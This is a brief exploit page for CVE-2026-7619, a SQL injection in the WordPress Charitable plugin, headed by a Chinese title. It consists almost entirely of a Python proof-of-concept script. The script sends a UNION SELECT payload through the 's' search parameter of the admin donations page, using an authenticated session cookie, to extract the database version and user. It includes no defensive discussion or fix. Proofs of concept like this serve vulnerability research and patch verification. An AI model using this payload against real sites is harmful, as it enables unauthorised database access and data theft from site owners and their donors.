CVE-2026-7619 WordPress Charitable插件SQL注入漏洞

import requests # Target URL (Example) target_url = "https://example.com/wp-admin/admin.php" # Attacker's session cookie (Must be authenticated with edit_others_donations capability) cookies = { "wordpress_logged_in_...": "attacker_session_cookie_value" } # Payload to extract version and current user # The vulnerable parameter is 's' (search) payload = "1' UNION SELECT 1,2,3,4,5,@@version,user(),8,9,10,11,12-- -" params = { "page": "charitable-donations", "post_type": "donation", "s": payload } try: response = requests.get(target_url, params=params, cookies=cookies, verify=False) if response.status_code == 200: print("Request sent successfully.") print("Check response content for database version and user.") # print(response.text) else: print(f"Failed to send request, status code: {response.status_code}") except Exception as e: print(f"An error occurred: {e}")